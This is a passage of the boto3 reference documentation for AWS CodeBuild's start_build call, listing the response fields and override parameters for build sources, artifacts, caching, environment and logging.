'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'secondarySourceVersions': [
{
'sourceIdentifier': 'string',
'sourceVersion': 'string'
},
],
'artifacts': {
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'location': 'string',
'sha256sum': 'string',
'md5sum': 'string',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'logs': {
'groupName': 'string',
'streamName': 'string',
'deepLink': 'string',
's3DeepLink': 'string',
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
},
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'buildComplete': True|False,
'initiator': 'string',
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'networkInterface': {
'subnetId': 'string',
'networkInterfaceId': 'string'
},
'encryptionKey': 'string'
}
}
**Response Structure**
- *(dict) --*
- **build** *(dict) --*
Information about the build to be run.
- **id** *(string) --*
The unique ID for the build.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build.
- **startTime** *(datetime) --*
When the build process started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build process ended, expressed in Unix time format.
- **currentPhase** *(string) --*
The current build phase.
- **buildStatus** *(string) --*
The current status of the build. Valid values include:
* ``FAILED`` : The build failed.
* ``FAULT`` : The build faulted.
* ``IN_PROGRESS`` : The build is still in progress.
* ``STOPPED`` : The build stopped.
* ``SUCCEEDED`` : The build succeeded.
* ``TIMED_OUT`` : The build timed out.
- **sourceVersion** *(string) --*
Any version identifier for the version of the source code to be built.
- **resolvedSourceVersion** *(string) --*
An identifier for the version of this build's source code.
* For AWS CodeCommit, GitHub, GitHub Enterprise, and BitBucket, the commit ID.
* For AWS CodePipeline, the source revision provided by AWS CodePipeline.
* For Amazon Simple Storage Service (Amazon S3), this does not apply.
- **projectName** *(string) --*
The name of the AWS CodeBuild project.
- **phases** *(list) --*
Information about all previous build phases that are complete and information about any current build phase that is not yet complete.
- *(dict) --*
Information about a stage for a build.
- **phaseType** *(string) --*
The name of the build phase. Valid values include:
* ``BUILD`` : Core build activities typically occur in this build phase.
* ``COMPLETED`` : The build has been completed.
* ``DOWNLOAD_SOURCE`` : Source code is being downloaded in this build phase.
* ``FINALIZING`` : The build process is completing in this build phase.
* ``INSTALL`` : Installation activities typically occur in this build phase.
* ``POST_BUILD`` : Post-build activities typically occur in this build phase.
* ``PRE_BUILD`` : Pre-build activities typically occur in this build phase.
* ``PROVISIONING`` : The build environment is being set up.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``SUBMITTED`` : The build has been submitted.
* ``UPLOAD_ARTIFACTS`` : Build output artifacts are being uploaded to the output location.
- **phaseStatus** *(string) --*
The current status of the build phase. Valid values include:
* ``FAILED`` : The build phase failed.
* ``FAULT`` : The build phase faulted.
* ``IN_PROGRESS`` : The build phase is still in progress.
* ``QUEUED`` : The build has been submitted and is queued behind other submitted builds.
* ``STOPPED`` : The build phase stopped.
* ``SUCCEEDED`` : The build phase succeeded.
* ``TIMED_OUT`` : The build phase timed out.
- **startTime** *(datetime) --*
When the build phase started, expressed in Unix time format.
- **endTime** *(datetime) --*
When the build phase ended, expressed in Unix time format.
- **durationInSeconds** *(integer) --*
How long, in seconds, between the starting and ending times of the build's phase.
- **contexts** *(list) --*
Additional information about a build phase, especially to help troubleshoot a failed build.
- *(dict) --*
Additional information about a build phase that has an error. You can use this information for troubleshooting.
- **statusCode** *(string) --*
The status code for the context of the build phase.
- **message** *(string) --*
An explanation of the build phase's context. This might include a command ID and an exit code.
- **source** *(dict) --*
Information about the source code to be built.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySourceVersions** *(list) --*
An array of ``ProjectSourceVersion`` objects. Each ``ProjectSourceVersion`` must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --*
An identifier for a source in the build project.
- **sourceVersion** *(string) --*
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch's HEAD commit ID is used. If not specified, the default branch's HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
- **artifacts** *(dict) --*
Information about the output artifacts for the build.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about build output artifacts.
- **location** *(string) --*
Information about the location of the build artifacts.
- **sha256sum** *(string) --*
The SHA-256 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **md5sum** *(string) --*
The MD5 hash of the build artifact.
You can use this hash along with a checksum tool to confirm file integrity and authenticity.
.. note::
This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The name of a service role used for this build.
- **logs** *(dict) --*
Information about the build's logs in Amazon CloudWatch Logs.
- **groupName** *(string) --*
The name of the Amazon CloudWatch Logs group for the build logs.
- **streamName** *(string) --*
The name of the Amazon CloudWatch Logs stream for the build logs.
- **deepLink** *(string) --*
The URL to an individual build log in Amazon CloudWatch Logs.
- **s3DeepLink** *(string) --*
The URL to a build log in an S3 bucket.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about S3 logs for a build project.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, for AWS CodeBuild to wait before timing out this build if it does not get marked as completed.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **buildComplete** *(boolean) --*
Whether the build is complete. True if complete; otherwise, false.
- **initiator** *(string) --*
The entity that started the build. Valid values include:
* If AWS CodePipeline started the build, the pipeline's name (for example, ``codepipeline/my-demo-pipeline`` ).
* If an AWS Identity and Access Management (IAM) user started the build, the user's name (for example, ``MyUserName`` ).
* If the Jenkins plugin for AWS CodeBuild started the build, the string ``CodeBuild-Jenkins-Plugin`` .
- **vpcConfig** *(dict) --*
If your AWS CodeBuild project accesses resources in an Amazon VPC, you provide this parameter that identifies the VPC ID and the list of security group IDs and subnet IDs. The security groups and subnets must belong to the same VPC. You must provide at least one security group and one subnet ID.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
- **networkInterface** *(dict) --*
Describes a network interface.
- **subnetId** *(string) --*
The ID of the subnet.
- **networkInterfaceId** *(string) --*
The ID of the network interface.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
:type projectName: string
:param projectName: **[REQUIRED]**
The name of the AWS CodeBuild build project to start running a build.
:type secondarySourcesOverride: list
:param secondarySourcesOverride:
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --* **[REQUIRED]**
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline\'s source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object\'s ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --* **[REQUIRED]**
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console\'s use only. Your code should not get or set this information directly.
- **type** *(string) --* **[REQUIRED]**
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build\'s start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
:type secondarySourcesVersionOverride: list
:param secondarySourcesVersionOverride:
An array of ``ProjectSourceVersion`` objects that specify one or more versions of the project\'s secondary sources to be used for this build only.
- *(dict) --*
A source identifier and its corresponding version.
- **sourceIdentifier** *(string) --* **[REQUIRED]**
An identifier for a source in the build project.
- **sourceVersion** *(string) --* **[REQUIRED]**
The source version for the corresponding source identifier. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example, ``pr/25`` ). If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
:type sourceVersion: string
:param sourceVersion:
A version of the build input to be built, for this build only. If not specified, the latest version is used. If specified, must be one of:
* For AWS CodeCommit: the commit ID to use.
* For GitHub: the commit ID, pull request ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a pull request ID is specified, it must use the format ``pr/pull-request-ID`` (for example ``pr/25`` ). If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Bitbucket: the commit ID, branch name, or tag name that corresponds to the version of the source code you want to build. If a branch name is specified, the branch\'s HEAD commit ID is used. If not specified, the default branch\'s HEAD commit ID is used.
* For Amazon Simple Storage Service (Amazon S3): the version ID of the object that represents the build input ZIP file to use.
:type artifactsOverride: dict
:param artifactsOverride:
Build output artifact settings that override, for this build only, the latest ones already defined in the build project.
- **type** *(string) --* **[REQUIRED]**
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
